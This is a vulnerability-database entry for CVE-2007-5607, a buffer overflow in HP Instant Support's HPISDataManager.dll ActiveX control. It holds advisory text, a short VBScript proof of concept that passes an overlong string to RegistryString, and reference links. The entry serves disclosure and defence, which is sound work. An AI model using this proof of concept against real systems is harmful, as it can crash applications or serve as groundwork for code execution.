HP Instant Support HPISDataManager.dll ActiveX Control RegistryString Function Buffer Overflow Vulnerability

Vulnerability ID: 1115348    Vulnerability Type: Code Injection
Published: 2008-06-04    Updated: 2008-08-13
CVE ID: CVE-2007-5607    CNNVD-ID: CNNVD-200806-059
Platform: Windows    CVSS Score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/31877
https://www.securityfocus.com/bid/29534
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-059
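|Vulnerability Details
HP Instant Support is a suite of web-based diagnostic and troubleshooting tools for desktop computing and printing products. In versions of HP Instant Support before 1.0.0.24, the RegistryString function of the installed HPISDataManager.dll ActiveX control contains a buffer overflow vulnerability that allows remote attackers to execute arbitrary code via a long argument.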
|Vulnerability Exploit (EXP)
source: http://www.securityfocus.com/bid/29534/info

HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.

An attacker can exploit this issue to execute arbitrary code in the context of an application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.

HP Instant Support 1.0.0.22 and earlier versions are affected.

NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information.

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>

'for debugging/custom prolog
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype = "Property Let RegistryString ( ByVal bstrRegistryKey As String , ByVal bUserKey As Long ) As String"
memberName = "RegistryString"
progid = "HPISDataManagerLib.Datamgr"
argCount = 3

arg1=String(2068, "B")
arg2=1
arg3="defaultV"

target.RegistryString(arg1 ,arg2 ) = arg3

</script></job></package>
|Affected Products
HP Instant Support 1.0 .22
|References

Source: XF
Name: hp-instantsupport-registrystring-bo(42848)
Link: http://xforce.iss.net/xforce/xfdb/42848
Source: HP
Name: SSRT071490
Link: http://www12.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01422264
Source: SECTRACK
Name: 1020165
Link: http://www.securitytracker.com/id?1020165
Source: BID
Name: 29534
Link: http://www.securityfocus.com/bid/29534
Source: BID
Name: 29526
Link: http://www.securityfocus.com/bid/29526
Source: VUPEN
Name: ADV-2008-1740
Link: http://www.frsirt.com/english/advisories/2008/1740/references
Source: MISC
Link: http://www.csis.dk/dk/forside/CSIS-RI-0003.pdf
Source: SECUNIA
Name: 30516
Link: http://secunia.com/advisories/30516